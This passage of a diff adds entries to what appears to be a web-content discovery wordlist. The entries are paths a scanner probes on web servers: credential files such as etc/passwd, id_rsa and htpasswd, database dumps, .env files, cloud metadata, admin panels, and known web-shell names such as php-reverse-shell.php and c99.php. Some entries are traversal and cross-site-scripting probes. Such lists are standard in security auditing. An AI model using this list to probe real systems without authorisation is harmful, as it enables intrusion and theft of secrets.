+demo/sql/index.jsp
+demos/
+denglu
+denglu/
+denglu/admin.asp
+depcomp
+dependency-reduced-pom.xml
+deploy
+deploy.env
+deploy.rb
+deploy.sh
+deps
+deps/deps.jl
+DerivedData/
+DerivedDataCache/
+desk/
+Desktop.ini
+desktop/
+desktop/index_framed.htm
+dev
+dev.env
+dev.php
+dev.zip
+dev/
+devdata.db
+devel/
+devel_isolated/
+develop-eggs/
+development-parts/
+development.esproj/
+development.log
+development/
+deviceupdatefiles_ext/
+deviceupdatefiles_int/
+df_main.sql
+dfshealth.jsp
+dhcp_log/
+dialin/
+dir-login/
+dir.php
+directadmin/
+dist
+dist/
+dkms.conf
+dlldata.c
+dms/AggreSpy
+dms/DMSDump
+dns.alpha.kubernetes.io
+doc
+doc/
+doc/api/
+docker-compose-dev.yml
+docker-compose.yml
+docker/
+Dockerfile
+DocProject/buildhelp/
+DocProject/Help/html
+DocProject/Help/Html2
+docs
+docs.json
+docs/
+docs/_build/
+docs/api-docs.json
+doctrine/
+doctrine/schema/eirec.yml
+doctrine/schema/tmx.yml
+documentation
+documentation/
+documentation/config.yml
+dokuwiki/
+dom.php
+domcfg.nsf
+door.php
+dotenv.env
+down/
+down/login
+download/
+download/history.csv
+download/users.csv
+downloader/
+downloader/cache.cfg
+downloader/connect.cfg
+downloadFile.php
+downloads/
+downloads/dom.php
+dra.php
+dswsbobje/
+dswsbobje/happyaxis.jsp
+duckrails/mocks/
+dummy
+dummy.php
+dump
+dump.7z
+dump.html
+dump.inc
+dump.inc.old
+dump.json
+dump.log
+dump.old
+dump.rar
+dump.rdb
+dump.sh
+dump.sql
+dump.sql.old
+dump.sql.tgz
+dump.sqlite
+dump.tar
+dump.tar.bz2
+dump.tar.gz
+dump.tgz
+dump.txt
+dump.zip
+dump/
+dumper.php
+dumper/
+dumps/
+dwsync.xml
+dz.php
+dz0.php
+dz1.php
+eagle.epf
+ecf/
+ecosystem.json
+ecp/
+edit.php
+editor-4.0.0-en.php
+editor-4.0.0-mysql-en.php
+editor-4.0.0.php
+editor-4.0.1-en.php
+editor-4.0.1-mysql-en.php
+editor-4.0.1.php
+editor-4.0.2-en.php
+editor-4.0.2-mysql-en.php
+editor-4.0.2.php
+editor-4.0.3-en.php
+editor-4.0.3-mysql-en.php
+editor-4.0.3.php
+editor-4.1.0-en.php
+editor-4.1.0-mysql-en.php
+editor-4.1.0.php
+editor-4.2.0-en.php
+editor-4.2.0-mysql-en.php
+editor-4.2.0.php
+editor-4.2.1-en.php
+editor-4.2.1-mysql-en.php
+editor-4.2.1.php
+editor-4.2.2-en.php
+editor-4.2.2-mysql-en.php
+editor-4.2.2.php
+editor-4.2.3-en.php
+editor-4.2.3-mysql-en.php
+editor-4.2.3.php
+editor-4.2.4-en.php
+editor-4.2.4-mysql-en.php
+editor-4.2.4.php
+editor-4.2.5-en.php
+editor-4.2.5-mysql-en.php
+editor-4.2.5.php
+editor-4.3.0-en.php
+editor-4.3.0-mysql-en.php
+editor-4.3.0.php
+editor-4.3.1-en.php
+editor-4.3.1-mysql-en.php
+editor-4.3.1.php
+editor-4.4.0-en.php
+editor-4.4.0-mysql-en.php
+editor-4.4.0.php
+editor-4.5.0-en.php
+editor-4.5.0-mysql-en.php
+editor-4.5.0.php
+editor-4.6.0-en.php
+editor-4.6.0-mysql-en.php
+editor-4.6.0.php
+editor-4.6.1-en.php
+editor-4.6.1-mysql-en.php
+editor-4.6.1.php
+editor-4.6.2-en.php
+editor-4.6.2-mysql-en.php
+editor-4.6.2.php
+editor-4.6.3-en.php
+editor-4.6.3-mysql-en.php
+editor-4.6.3.php
+editor-4.7.0-en.php
+editor-4.7.0-mysql-en.php
+editor-4.7.0.php
+editor-4.7.1-en.php
+editor-4.7.1-mysql-en.php
+editor-4.7.1.php
+editor-4.7.2-en.php
+editor-4.7.2-mysql-en.php
+editor-4.7.2.php
+editor-4.7.3-en.php
+editor-4.7.3-mysql-en.php
+editor-4.7.3.php
+editor-4.7.4-en.php
+editor-4.7.4-mysql-en.php
+editor-4.7.4.php
+editor-4.7.5-en.php
+editor-4.7.5-mysql-en.php
+editor-4.7.5.php
+editor-4.7.6-en.php
+editor-4.7.6-mysql-en.php
+editor-4.7.6.php
+editor-4.7.7-en.php
+editor-4.7.7-mysql-en.php
+editor-4.7.7.php
+editor-4.7.8-en.php
+editor-4.7.8-mysql-en.php
+editor-4.7.8.php
+editor-4.7.9-en.php
+editor-4.7.9-mysql-en.php
+editor-4.7.9.php
+editor-4.8.0-en.php
+editor-4.8.0-mysql-en.php
+editor-4.8.0.php
+editor-4.8.1-en.php
+editor-4.8.1-mysql-en.php
+editor-4.8.1.php
+editor.php
+editor/
+editor/FCKeditor
+editor/stats/
+editor/tiny_mce/
+editor/tinymce/
+editors/
+editors/FCKeditor
+EemAdminService/EemAdmin?wsdl
+eggs/
+ehthumbs.db
+elastic/
+elasticsearch/
+elfinder/
+elfinder/elfinder.php
+elm-stuff
+elmah.axd
+email/
+encode-explorer.php
+encode-explorer_5.0/
+encode-explorer_5.1/
+encode-explorer_6.0/
+encode-explorer_6.1/
+encode-explorer_6.2/
+encode-explorer_6.3/
+encode-explorer_6.4.1/
+encode-explorer_6.4/
+encode_explorer-3.2/
+encode_explorer-3.3/
+encode_explorer-3.4/
+encode_explorer-4.0/
+encode_explorer.php
+encode_explorer/
+encode_explorer_32/
+engine.tar.gz
+engine.zip
+engine/
+engine/classes/swfupload/swfupload.swf
+engine/classes/swfupload/swfupload_f9.swf
+engine/log.txt
+env
+env.bak/
+env.js
+env.json
+env.list
+ENV/
+env/
+environment.rb
+erl_crash.dump
+err
+err.log
+err.txt
+error
+error-log
+error-log.txt
+error.asp
+error.cpp
+error.ctp
+error.html
+error.ini
+error.log
+error.log.0
+error.tmpl
+error.tpl
+error.txt
+error.xml
+error/
+error_import
+error_log
+error_log.gz
+error_log.txt
+errorlog
+errorPages
+errors.asp
+errors.log
+errors.tpl
+errors.txt
+errors/
+errors/creation
+errors/local.xml
+etc
+etc/
+etc/config.ini
+etc/database.xml
+etc/hosts
+etc/lib/pChart2/examples/imageMap/index.php
+etc/passwd
+etcd-apiserver-client.key
+etcd-ca.crt
+etcd-events.log
+etcd.log
+eudora.ini
+eula.txt
+eula_en.txt
+ews/
+example.php
+examples
+examples/
+examples/jsp/%252e%252e/%252e%252e/manager/html/
+examples/jsp/snp/snoop.jsp
+examples/servlet/SnoopServlet
+examples/servlets/servlet/CookieExample
+examples/servlets/servlet/RequestHeaderExample
+exception.log
+exchange/
+exchweb/
+exec
+expires.conf
+exploded-archives/
+explore
+explore/repos
+explorer
+export
+export.cfg
+export/
+export_presets.cfg
+ExportedObj/
+exports.zip
+ext/
+ext/.deps
+ext/build/
+ext/config
+ext/install-sh
+ext/libtool
+ext/ltmain.sh
+ext/Makefile
+ext/missing
+ext/mkinstalldirs
+ext/modules/
+ext/run-tests.php
+extjs/
+extjs/resources//charts.swf
+extras/documentation
+ezsqliteadmin/
+fabric/
+fake-eggs/
+FakesAssemblies/
+FAQ
+fastlane/Preview.html
+fastlane/readme.md
+fastlane/report.xml
+fastlane/screenshots
+fastlane/test_output
+fcgi-bin/echo
+fcgi-bin/echo.exe
+fcgi-bin/echo2
+fcgi-bin/echo2.exe
+FCKeditor
+fckeditor
+FCKeditor/
+fckeditor/
+fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/asp/connector.asp
+fckeditor/editor/filemanager/connectors/asp/upload.asp
+fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+fckeditor/editor/filemanager/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/php/upload.php
+fckeditor/editor/filemanager/upload/asp/upload.asp
+fckeditor/editor/filemanager/upload/aspx/upload.aspx
+fckeditor/editor/filemanager/upload/php/upload.php
+FCKeditor2.0/
+FCKeditor2.1/
+FCKeditor2.2/
+FCKeditor2.3/
+FCKeditor2.4/
+FCKeditor2/
+FCKeditor20/
+FCKeditor21/
+FCKeditor22/
+FCKeditor23/
+FCKeditor24/
+features
+features.json
+feixiang.php
+file.php
+file_manager/
+file_upload.asp
+file_upload.aspx
+file_upload.cfm
+file_upload.htm
+file_upload.html
+file_upload.php
+file_upload.php3
+file_upload.shtm
+file_upload/
+fileadmin
+fileadmin.php
+fileadmin/
+fileadmin/_processed_/
+fileadmin/_temp_/
+fileadmin/user_upload/
+filedump/
+filemanager
+filemanager/
+filemanager/views/js/ZeroClipboard.swf
+filerun.php
+filerun/
+files.7z
+files.md5
+files.php
+files.rar
+files.tar
+files.tar.bz2
+files.tar.gz
+files.zip
+files/
+Files/binder.autosave
+Files/binder.backup
+files/cache/
+Files/Docs/docs.checksum
+Files/search.indexes
+files/tmp/
+Files/user.lock
+fileupload/
+filezilla.xml
+FileZilla.xml
+findbugs/
+firebase-debug.log
+flash/
+flash/ZeroClipboard.swf
+flashFXP.ini
+fluent.conf
+fluent_aggregator.conf
+flyway
+fmr.php
+formslogin/
+forum.rar
+forum.sql
+forum.tar
+forum.tar.bz2
+forum.tar.gz
+forum.zip
+forum/
+forum/install/install.php
+forums/
+forums/cache/db_update.lock
+fpadmin
+fpadmin/
+fpm-ping
+fpm-status
+framework.zip
+framework/yiic.php
+freeline.py
+freeline/
+freeline_project_description.json
+ftp.txt
+fuel/app/cache/
+fuel/app/config/
+fuel/app/logs/
+function.require
+functions/
+ganglia/
+gateway/
+gaza.php
+gbpass.pl
+Gemfile
+Gemfile.lock
+GEMINI/
+gen/
+Generated_Code/
+get.php
+getFile.cfm
+git-service
+git/
+github-cache
+github-recovery-codes.txt
+github/
+gitlab/
+gitlog
+gl/
+global
+global.asa
+global.asa.bak
+global.asa.old
+global.asa.orig
+global.asa.temp
+global.asa.tmp
+global.asax
+global.asax.bak
+global.asax.old
+global.asax.orig
+global.asax.temp
+global.asax.tmp
+globals
+globals.inc
+globals.jsa
+globes_admin/
+glpi/
+google-services.json
+grabbed.html
+gradle-app.setting
+gradle/
+grafana/
+graphiql
+graphiql.php
+graphiql/
+graphite/
+graphql
+graphql.js
+graphql.php
+graphql/
+graphql/console/
+grappelli/
+graylog/
+groovy/
+groupexpansion/
+GruntFile.coffee
+Gruntfile.coffee
+gruntfile.coffee
+Gruntfile.js
+gruntFile.js
+gruntfile.js
+guanli
+guanli/
+guanli/admin.asp
+Guardfile
+gulp-azure-sync-assets.js
+Gulpfile
+Gulpfile.coffee
+gulpfile.coffee
+Gulpfile.js
+gulpfile.js
+gwt-unitCache/
+h2console
+hac/
+happyaxis.jsp
+haproxy/
+health
+health.json
+healthcheck.php
+heapdump
+heapdump.json
+HISTORY
+HISTORY.txt
+hmc/
+HNAP1/
+hndUnblock.cgi
+home.html
+home.php
+home.rar
+home.tar
+home.tar.bz2
+home.tar.gz
+home.zip
+Homestead.json
+Homestead.yaml
+host-manager/
+host-manager/html
+hosts
+houtai
+houtai/
+houtai/admin.asp
+hpwebjetadmin/
+hs_err_pid.log
+htaccess.backup
+htaccess.bak
+htaccess.dist
+htaccess.old
+htaccess.txt
+htdocs
+htdocs.zip
+htgroup
+html.tar
+html.tar.bz2
+html.tar.gz
+html.zip
+html/
+html/config.rb
+html/js/misc/swfupload/swfupload.swf
+html/js/misc/swfupload/swfupload_f9.swf
+htmlcov/
+htpasswd
+htpasswd.bak
+htpasswd/
+htpasswd/htpasswd.bak
+Http/
+Http/DataLayCfg.xml
+http_access.log
+httpd.conf
+httpd.conf.backup
+httpd.conf.default
+httpd.core
+httpd.ini
+httpd/
+httpd/logs/access.log
+httpd/logs/access_log
+httpd/logs/error.log
+httpd/logs/error_log
+httptrace
+hudson/
+hudson/login
+hybridconfig/
+hystrix
+i.php
+icinga/
+id_dsa
+id_dsa.ppk
+id_rsa
+id_rsa.pub
+iiasdmpwd/
+iisadmin/
+images/
+images/c99.php
+images/Sym.php
+import.php
+import/
+import_error.log
+importcockpit/
+in/
+inc/
+inc/config.inc
+inc/fckeditor/
+inc/tiny_mce/
+inc/tinymce/
+include
+include/
+include/fckeditor/
+includes
+includes/
+includes/adovbs.inc
+includes/bootstrap.inc
+includes/configure.php~
+includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
+includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/php/upload.php
+includes/fckeditor/editor/filemanager/upload/asp/upload.asp
+includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/upload/php/upload.php
+includes/js/tiny_mce/
+includes/swfupload/swfupload.swf
+includes/swfupload/swfupload_f9.swf
+includes/tiny_mce/
+includes/tinymce/
+index-bak
+index-test.php
+index.htm
+index.html
+index.php
+index.php-bak
+index.php.bak
+index.php3
+index.php4
+index.php5
+index.php~
+index.tar
+index.tar.bz2
+index.tar.gz
+index.xml
+index.zip
+index2.php
+index3.php
+index_manage
+Indy_admin/
+influxdb/
+info
+info.json
+info.php
+info.txt
+infos.php
+ingress.yaml
+init/
+inspector
+instadmin/
+INSTALL
+Install
+install
+install-log.txt
+install-sh
+install.asp
+install.aspx
+install.bak
+install.config
+install.htm
+INSTALL.HTML
+INSTALL.html
+Install.html
+install.html
+install.inc
+INSTALL.MD
+INSTALL.md
+Install.md
+install.md
+INSTALL.mysql
+install.mysql
+INSTALL.mysql.txt
+install.mysql.txt
+INSTALL.pgsql
+install.pgsql
+INSTALL.pgsql.txt
+install.pgsql.txt
+install.php
+install.rdf
+install.sql
+install.tpl
+INSTALL.TXT
+INSTALL.txt
+Install.txt
+install.txt
+install.zip
+install/
+install/index.php?upgrade/
+install/update.log
+install_
+INSTALL_admin
+install_manifest.txt
+install_mgr.log
+installation.php
+installation/
+installed.json
+InstalledFiles
+installer
+installer-backup.php
+installer-data.sql
+installer-log.txt
+installer.php
+installer_files/
+install~/
+instance/
+integrationgraph
+Intermediate/
+internal/docs
+invoker/
+invoker/JMXInvokerServlet
+invoker/readonly/JMXInvokerServlet
+invoker/restricted/JMXInvokerServlet
+io.swf
+iOSInjectionProject/
+ipch/
+irc-macadmin/
+irequest/
+isadmin
+isadmin.php
+ispmgr/
+iwa/authenticated.aspx
+iwa/iwa_test.aspx
+j2ee/servlet/SnoopServlet
+jacoco/
+Jakefile
+javascripts/bundles
+javax.faces.resource.../
+javax.faces.resource.../WEB-INF/web.xml.jsf
+jboss-net/
+jboss-net//happyaxis.jsp
+jboss-net/happyaxis.jsp
+jboss/server/all/deploy/project.ext
+jboss/server/all/log/
+jboss/server/default/deploy/project.ext
+jboss/server/default/log/
+jboss/server/minimal/deploy/project.ext
+jbossws/services
+jbpm-console/app/tasks.jsf
+jdbc
+jdkstatus
+jenkins/
+Jenkinsfile
+jira/
+jk-status
+jk/
+jkmanager
+jkmanager-auth
+jkstatus
+jkstatus-auth
+jmx-console
+jmx-console/
+jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
+jo.php
+jolokia
+jolokia/
+jolokia/list
+joomla.rar
+joomla.xml
+joomla.zip
+joomla/
+joomla/administrator
+js/
+js/elfinder/elfinder.php
+js/envConfig.js
+js/FCKeditor
+js/prepod.js
+js/prod.js
+js/qa.js
+js/routing
+js/swfupload/swfupload.swf
+js/swfupload/swfupload_f9.swf
+js/tiny_mce/
+js/tinymce/
+js/yui/uploader/assets/uploader.swf
+js/ZeroClipboard.swf
+js/ZeroClipboard10.swf
+jscripts/
+jscripts/tiny_mce/
+jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
+jscripts/tinymce/
+jsp-examples/
+jsp-reverse.jsp
+jsp/viewer/snoop.jsp
+jspm_packages/
+jssresource/
+juju/
+junit/
+kafka/
+kairosdb/
+karma.conf.js
+kcfinder/
+kcfinder/browse.php
+key.pem
+keys.json
+kibana/
+killer.php
+known_tokens.csv
+kpanel/
+krb.log
+krblog.txt
+kube-apiserver.log
+kube-controller-manager.log
+kube-proxy.log
+kube-scheduler.log
+kube/
+kuber/
+kubernetes/
+l0gs.txt
+L3b.php
+lander.logs
+latest/meta-data/hostname
+latest/user-data
+layouts/
+ldap.prop
+ldap.prop.sample
+ldap/
+letmein
+letmein.php
+letmein/
+level
+lfm.php
+lg/
+lg/lg.conf
+lia.cache
+lib-cov
+lib/
+lib/bundler/man/
+lib/fckeditor/
+lib/flex/uploader/.actionScriptProperties
+lib/flex/uploader/.flexProperties
+lib/flex/uploader/.project
+lib/flex/uploader/.settings
+lib/flex/varien/.actionScriptProperties
+lib/flex/varien/.flexLibProperties
+lib/flex/varien/.project
+lib/flex/varien/.settings
+lib/tiny_mce/
+lib/tinymce/
+lib64/
+libraries/
+libraries/phpmailer/
+libraries/tiny_mce/
+libraries/tinymce/
+librepag.log
+LICENSE
+license
+LICENSE.md
+license.md
+license.php
+LICENSE.txt
+license.txt
+license_key.php
+liferay.log
+liferay/
+lighttpd.access.log
+lighttpd.error.log
+lilo.conf
+lindex.php
+linkhub/
+linkhub/linkhub.log
+linktous.html
+linusadmin-phpinfo.php
+liquibase
+list_emails
+listener.log
+lists/
+lists/config
+LiveUser_Admin/
+lk/
+load.php
+local.config.rb
+local.properties
+local.xml.additional
+local.xml.template
+local/
+local/composer.lock
+local/composer.phar
+local_bd_new.txt
+local_bd_old.txt
+local_conf.php.bac
+local_conf.php.bak
+local_settings.py
+localhost.sql
+localsettings.php.bak
+localsettings.php.dist
+localsettings.php.old
+localsettings.php.save
+localsettings.php.swp
+localsettings.php.txt
+localsettings.php~
+log
+log-in
+log-in.php
+log-in/
+log.htm
+log.html
+log.json
+log.mdb
+log.php
+log.sqlite
+log.txt
+log/
+log/access.log
+log/access_log
+log/authorizenet.log
+log/development.log
+log/error.log
+log/error_log
+log/exception.log
+log/librepag.log
+log/log.log
+log/log.txt
+log/old
+log/payment.log
+log/payment_authorizenet.log
+log/payment_paypal_express.log
+log/production.log
+log/server.log
+log/test.log
+log/www-error.log
+log_1.txt
+log_errors.txt
+log_in
+log_in.php
+log_in/
+logexpcus.txt
+logfile
+logfile.txt
+logfiles
+loggers
+loggers.json
+loggers/
+logi.php
+login
+login-gulp.js
+login-redirect/
+login-us/
+login.asp
+login.cgi
+login.htm
+login.html
+login.json
+login.php
+login/
+login/admin/admin.asp
+login/index
+login/login
+login/super
+login1
+login1/
+login_admi
+login_admin
+login_admin/
+login_db/
+login_ou.php
+login_out
+login_out/
+login_use.php
+login_user
+loginerror/
+loginflat/
+loginok/
+logins.txt
+loginsave/
+loginsupe.php
+loginsuper
+loginsuper/
+logo_sysadmin/
+logou.php
+logout
+logout.asp
+logout/
+logs
+logs.htm
+logs.html
+logs.mdb
+logs.pl
+logs.sqlite
+logs.txt
+Logs/
+logs/
+logs/access.log
+logs/access_log
+logs/error.log
+logs/error_log
+logs/liferay.log
+logs/mail.log
+logs/proxy_access_ssl_log
+logs/proxy_error_log
+logs/wsadmin.traceout
+logs/www-error.log
+logs_backup/
+logs_console/
+logstash/
+lol.php
+Lotus_Domino_Admin/
+ltmain.sh
+luac.out
+m4/libtool.m4
+m4/ltoptions.m4
+m4/ltsugar.m4
+m4/ltversion.m4
+m4/lt~obsolete.m4
+macadmin/
+madspot.php
+madspotshell.php
+magic.default
+magmi/
+magmi/conf/magmi.ini
+mail
+mail.log
+mail/
+Mail/smtp/Admin/smadv.asp
+mailer/.env
+mailman/
+mailman/listinfo
+main.env
+main.mdb
+main.zip
+main/
+main/login
+maint/
+MAINTAINERS.txt
+maintenance.flag
+maintenance.flag.bak
+maintenance.flag2
+maintenance.html
+maintenance.php
+maintenance/
+maintenance/test.php
+maintenance/test2.php
+Makefile
+Makefile.in
+Makefile.old
+manage
+manage.php
+manage.py
+manage/
+manage/admin.asp
+manage/login.asp
+manage_index
+management
+management.php
+management/
+management/configprops
+management/env
+manager
+manager.php
+manager/
+manager/admin.asp
+manager/html
+manager/login
+manager/login.asp
+manager/status/all
+MANIFEST
+MANIFEST.bak
+MANIFEST.MF
+manifest.mf
+manifest.yml
+manifest/cache/
+manifest/logs/
+manifest/tmp/
+manuallogin/
+mappings
+mappings.json
+master.passwd
+master.tar
+master.tar.bz2
+master.tar.gz
+master.zip
+master/
+master/portquotes_new/admin.log
+mattermost/
+maven/
+mbox
+mcollective/
+mcx/
+mcx/mcxservice.svc
+mdate-sh
+media.tar
+media.tar.bz2
+media.tar.gz
+media.zip
+media/
+media/export-criteo.xml
+meet/
+meeting/
+member
+member.php
+member/
+member/admin.asp
+member/login.asp
+memberadmin
+memberadmin.php
+memberadmin/
+memberlist
+members
+members.csv
+members.log
+members.mdb
+members.php
+members.sql
+members.sql.gz
+members.sqlite
+members.txt
+members.xls
+members/
+membersonly
+memcached/
+memlogin/
+mercurial.ini
+mercurial/
+Mercury.modules
+Mercury/
+mesos/
+META-INF/
+META-INF/context.xml
+META.json
+META.yml
+meta_login/
+metadata.rb
+metric/
+metric_tracking
+metric_tracking.json
+metrics
+metrics.json
+metrics/
+microsoft-server-activesync/
+mics/
+mics/mics.html
+mifs/
+mifs/user/index.html
+migration.log
+mimosa-config.coffee
+mimosa-config.js
+mirror.cfg
+mirror/
+misc
+missing
+mkdocs.yml
+Mkfile.old
+moadmin.php
+moadmin/
+mock/
+modelsearch/
+modelsearch/admin.html
+modelsearch/admin.php
+modelsearch/index.html
+modelsearch/index.php
+modelsearch/login
+modelsearch/login.html
+modelsearch/login.php
+moderator
+moderator.html
+moderator.php
+moderator/
+moderator/admin
+moderator/admin.html
+moderator/admin.php
+moderator/login
+moderator/login.html
+moderator/login.php
+modern.json
+modern.jsonp
+Module.symvers
+module.zip
+modules.order
+modules/
+modules/admin/
+mongo/
+mongodb/
+monit/
+monitor
+monitor/
+monitoring
+monitoring/
+moving.page
+mrtg.cfg
+msg/
+msg_gen/
+msmtp_default.log
+msql/
+mssql/
+mt-check.cgi
+munin/
+muracms.esproj
+mw-config/
+mx.php
+my.7z
+my.rar
+my.tar
+my.tar.bz2
+my.tar.gz
+my.zip
+myadm/
+MyAdmin/
+myadmin/
+myadmin/index.php
+MyAdmin/scripts/setup.php
+myadmin/scripts/setup.php
+myadmin2/index.php
+myadminscripts/
+myadminscripts/setup.php
+myconf.env
+myserver.key
+mysql-admin/
+mysql-admin/index.php
+mysql.err
+mysql.log
+mysql.php
+mysql.sql
+mysql.tar
+mysql.tar.bz2
+mysql.tar.gz
+mysql.zip
+mysql/
+mysql/admin/
+mysql/db/
+mysql/dbadmin/
+mysql/index.php
+mysql/mysqlmanager/
+mysql/pMA/
+mysql/pma/
+mysql/scripts/setup.php
+mysql/sqlmanager/
+mysql/web/
+mysql_debug.sql
+mysqladmin/
+mysqladmin/index.php
+mysqladmin/scripts/setup.php
+mysqldump.sql
+mysqldumper/
+mysqlitedb.db
+mysqlmanager/
+naginator/
+nagios/
+nano.save
+native_stderr.log
+native_stdout.log
+navSiteAdmin/
+nb-configuration.xml
+nbactions.xml
+nbproject/
+nbproject/private/private.properties
+nbproject/private/private.xml
+nbproject/project.properties
+nbproject/project.xml
+netdata/
+New%20Folder
+New%20folder%20(2)
+new.7z
+new.php
+new.rar
+new.tar
+new.tar.bz2
+new.tar.gz
+new.zip
+newbbs/
+newbbs/login
+newsadmin/
+nextcloud/
+nfs/
+ng-cli-backup.json
+nginx-access.log
+nginx-error.log
+nginx-ssl.access.log
+nginx-ssl.error.log
+nginx-status/
+nginx.conf
+nginx_status
+nginx_template.conf
+ngx_pagespeed_beacon/
+nia.cache
+nimcache/
+nlia.cache
+node-role.kubernetes.io
+node_modules
+node_modules/
+nohup.out
+nosetests.xml
+npm-debug.log
+npm-shrinkwrap.json
+nra.cache
+nst.php
+nstview.php
+nsw/
+nsw/admin/login.php
+nwp-content/
+nwp-content/plugins/disqus-comment-system/disqus.php
+nytprof.out
+oab/
+obj/
+ocp.php
+ocsp/
+odbc
+Office/
+Office/graph.php
+olap/
+old
+old.7z
+old.htaccess
+old.htpasswd
+old.rar
+old.tar
+old.tar.bz2
+old.tar.gz
+old.zip
+old/
+old_files
+old_site/
+oldfiles
+ona
+opa-debug-js
+open-flash-chart.swf?get-data=xss
+OpenCover/
+openshift/
+openstack/
+opentsdb/
+openvpn.ovpn
+openvpnadmin/
+operador/
+operator/
+oprocmgr-service
+oprocmgr-status
+ops/
+oracle
+order.log
+order.txt
+order_add_log.txt
+order_log
+orders
+orders.csv
+orders.log
+orders.sql
+orders.sql.gz
+orders.txt
+orders.xls
+orders_log
+orleans.codegen.cs
+ospfd.conf
+osticket/
+otrs/
+out.txt
+out/
+output
+output-build.txt
+output/
+OWA/
+owa/
+owncloud/
+p.php
+p/
+p/m/a/
+package-cache
+package-lock.json
+package.json
+Package.StoreAssociation.xml
+package/
+packer_cache/
+pagerduty/
+pages/
+pages/admin/
+pages/admin/admin-login
+pages/admin/admin-login.html
+pages/admin/admin-login.php
+painel/
+painel/config/config.php.example
+paket-files/
+panel
+panel-administracion/
+panel-administracion/admin.html
+panel-administracion/admin.php
+panel-administracion/index.html
+panel-administracion/index.php
+panel-administracion/login
+panel-administracion/login.html
+panel-administracion/login.php
+panel.php
+panel/
+params.txt
+parts/
+pass
+pass.dat
+pass.txt
+passes.txt
+passlist
+passlist.txt
+passwd
+passwd.adjunct
+passwd.bak
+passwd.txt
+Password
+password
+password.html
+password.log
+password.mdb
+password.sqlite
+password.txt
+passwords
+passwords.html
+passwords.mdb
+passwords.sqlite
+passwords.txt
+path/
+path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+pause
+pause.json
+payment.log
+payment_authorizenet.log
+payment_paypal_express.log
+pbmadmin/
+pbx/
+pentaho/
+perl-reverse-shell.pl
+perlcmd.cgi
+persistentchat/
+personal
+personal.mdb
+personal.sqlite
+pg_hba.conf
+pgadmin
+pgadmin.log
+pgadmin/
+PharoDebug.log
+phinx.yml
+phoenix
+phoneconferencing/
+php
+php-backdoor.php
+php-cgi.core
+php-cli.ini
+php-cs-fixer.phar
+php-error.log
+php-error.txt
+php-errors.log
+php-errors.txt
+php-findsock-shell.php
+php-fpm/
+php-fpm/error.log
+php-fpm/www-error.log
+php-info.php
+php-my-admin/
+php-myadmin/
+php-reverse-shell.php
+php-tiny-shell.php
+php.core
+php.error.log
+php.ini
+php.ini-orig.txt
+php.ini.sample
+php.ini_
+php.ini~
+php.lnk
+php.log
+php.php
+php/
+php/dev/
+php/php.cgi
+php4.ini
+php5.fcgi
+php5.ini
+php_cli_errors.log
+php_error.log
+php_error_log
+php_errorlog
+php_errors.log
+phpadmin/
+phpadmin/index.php
+phpadminmy/
+phperrors.log
+phpFileManager.php
+phpFileManager/
+phpfm-1.6.1/
+phpfm-1.7.1/
+phpfm-1.7.2/
+phpfm-1.7.3/
+phpfm-1.7.4/
+phpfm-1.7.5/
+phpfm-1.7.6/
+phpfm-1.7.7/
+phpfm-1.7.8/
+phpfm-1.7/
+phpfm.php
+phpfm/
+phpinfo
+phpinfo.php
+phpinfo.php3
+phpinfo.php4
+phpinfo.php5
+phpinfos.php
+phpini.bak
+phpldapadmin
+phpldapadmin/
+phpliteadmin%202.php
+phpliteadmin.php
+phpLiteAdmin/
+phpLiteAdmin_/
+phpm/
+phpma/
+phpma/index.php
+phpmailer
+phpmanager/
+phpmem/
+phpmemcachedadmin/
+phpminiadmin.php
+phpminiadmin/
+phpMoAdmin/
+phpmoadmin/
+phpmy-admin/
+phpMy/
+phpmy/
+phpMyA/
+phpmyad-sys/
+phpmyad/
+phpMyAdmi/
+phpMyAdmin-2.10.0/
+phpMyAdmin-2.10.1/
+phpMyAdmin-2.10.2/
+phpMyAdmin-2.10.3/
+phpMyAdmin-2.11.0/
+phpMyAdmin-2.11.1/
+phpMyAdmin-2.11.10/
+phpMyAdmin-2.11.2/
+phpMyAdmin-2.11.3/
+phpMyAdmin-2.11.4/
+phpMyAdmin-2.11.5.1-all-languages/
+phpMyAdmin-2.11.5/
+phpMyAdmin-2.11.6-all-languages/
+phpMyAdmin-2.11.6/
+phpMyAdmin-2.11.7.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.7.1-all-languages/
+phpMyAdmin-2.11.7/
+phpMyAdmin-2.11.8.1-all-languages-utf-8-only/
+phpMyAdmin-2.11.8.1-all-languages/
+phpMyAdmin-2.11.8.1/
+phpMyAdmin-2.11.9/
+phpMyAdmin-2.2.3/
+phpMyAdmin-2.2.6/
+phpMyAdmin-2.5.1/
+phpMyAdmin-2.5.4/
+phpMyAdmin-2.5.5-pl1/
+phpMyAdmin-2.5.5-rc1/
+phpMyAdmin-2.5.5-rc2/
+phpMyAdmin-2.5.5/
+phpMyAdmin-2.5.6-rc1/
+phpMyAdmin-2.5.6-rc2/
+phpMyAdmin-2.5.6/
+phpMyAdmin-2.5.7-pl1/
+phpMyAdmin-2.5.7/
+phpMyAdmin-2.6.0-alpha/
+phpMyAdmin-2.6.0-alpha2/
+phpMyAdmin-2.6.0-beta1/
+phpMyAdmin-2.6.0-beta2/
+phpMyAdmin-2.6.0-pl1/
+phpMyAdmin-2.6.0-pl2/
+phpMyAdmin-2.6.0-pl3/
+phpMyAdmin-2.6.0-rc1/
+phpMyAdmin-2.6.0-rc2/
+phpMyAdmin-2.6.0-rc3/
